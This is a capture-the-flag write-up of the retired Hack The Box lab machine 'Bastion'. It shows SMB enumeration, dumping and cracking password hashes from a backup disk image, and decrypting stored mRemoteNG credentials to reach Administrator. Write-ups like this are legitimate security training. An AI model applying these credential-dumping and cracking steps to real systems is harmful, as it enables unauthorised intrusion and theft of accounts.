Writeup for the retired HTB machine Bastion
Link: https://www.hackthebox.eu/home/machines/profile/186


A qick portscan reveals multiple open ports:

22/tcp  open  ssh
135/tcp open  msrpc
139/tcp open  netbios-ssn
445/tcp open  microsoft-ds


A closer investigation of the SMB service reveals that it is allowing anonymous access with disabled message signing, which in turn enables public enumeration.
msf5 > use auxiliary/scanner/smb/pipe_auditor
This yields some interesting endpoints:

[+]      - Pipes: \netlogon, \lsarpc, \samr, \atsvc, \epmapper, \eventlog, \InitShutdown, \lsass, \LSM_API_service, \ntsvcs, \protected_storage, \scerpc, \srvsvc, \trkwks, \W32TIME_ALT, \wkssvc

msf5 > use auxiliary/scanner/smb/smb_enumshares

[-]      - Login Failed: Unable to Negotiate with remote host
[+]      - ADMIN$ - (DISK) Remote Admin
[+]      - Backups - (DISK) 
[+]      - C$ - (DISK) Default share
[+]      - IPC$ - (IPC) Remote IPC

So let’s look into the shares. First, let’s mount the Backups share:
sudo mount -t cifs -o user=guest // /mnt/ There’s a Backup of a full client machine at WindowsImageBackup/L4mpje-PC/Backup 2019-02-22 124351 to be discovered.

The Backup

This VHD, copied and then mounted on Linux enabled closer investigation: sudo guestmount -a 9b9cfbc4-369e-11e9-a17c-806e6f6e6963.vhd -i --ro /mnt/guest/

With an unbooted Windows installation like this, it is possible to copy registry hives from C:\Windows\system32\config\ and dump the NTHash for the users:

apalax@raudfjorden:~/writeups/HTB/Labs/Bastion$ pwdump SYSTEM SAM 

The syntax for these hashes is username:id:LM-Hash:NT-Hash. These are then copied into hashes.txt and handed off to john for a dictionary attack:

john --format=nt hashes.txt --wordlist=/usr/share/wordlists/rockyou.txt
Using default input encoding: UTF-8
Loaded 2 password hashes with no different salts (NT [MD4 256/256 AVX2 8x3])
Warning: no OpenMP support for this hash type, consider --fork=2
Press 'q' or Ctrl-C to abort, almost any other key for status
bureaulampje     (L4mpje)
2g 0:00:00:00 DONE (2019-09-05 19:36) 2.222g/s 10439Kp/s 10439Kc/s 10444KC/s burg772v..burdy1
Warning: passwords printed above might not be all those cracked
Use the "--show --format=NT" options to display all of the cracked passwords reliably
Session completed

So it seems we have a user login / password combination.
If we connect via SSH, we’re dropped into a CMD (?).
user.txt can be found at the desktop and printed with type user.txt.

Road to root

A try was to make use of Matt Graebers tool, Powersploit.

First, Powersploit needs to be downloaded:
wget -OutFile ps.zip
So download the Privesc folder into the PS Module path, import the module and run:

Import-Module Privesc
Get-Command -Module Privesc
    <available commands>
    <stuff stuff>

[*] Checking %PATH% for potentially hijackable .dll locations...                                           

HijackablePath : C:\Users\L4mpje\AppData\Local\Microsoft\WindowsApps\                                      
AbuseFunction  : Write-HijackDll -OutputFile 'C:\Users\L4mpje\AppData\Local\Microsoft\WindowsApps\wlbsctrl.dll' -Command '...'    

Which seems to not work. Poking around shows an SSH config file reveals:

Match Group administrators                                                                       
       AuthorizedKeysFile __PROGRAMDATA__/ssh/administrators_authorized_keys 

unfortunately, we don’t have write access to that folder as user, so another path for privilege escalation is needed.


A more thorough investigation reveals that mRemoteNG is installed, a remote administration tool.
On closer examination it is revealed that this software suffers from insecure password storage issues.
The credentials are stored in a connection.xml:

PS C:\Users\L4mpje\AppData\Roaming\mRemoteNG> type .\confCons.xml

Which can be decrypted with mremoteng-decrypt.
This is done by providing the decrypter the administrator password hash:

python mremoteng_decrypt.py -s "aEWNFV5uGcjUHF0uS17QTdT9kVqtKCPeoC0Nw5dmaPFjNQ2kt/zO5xDqE4HdVmHAowVRdC7emf7lWWA10dQKiw==" 
Password: thXLHM96BeKL0ER2

This yields the password for the Administrator account. Connect, cd to Desktop and print the flag with type root.txt.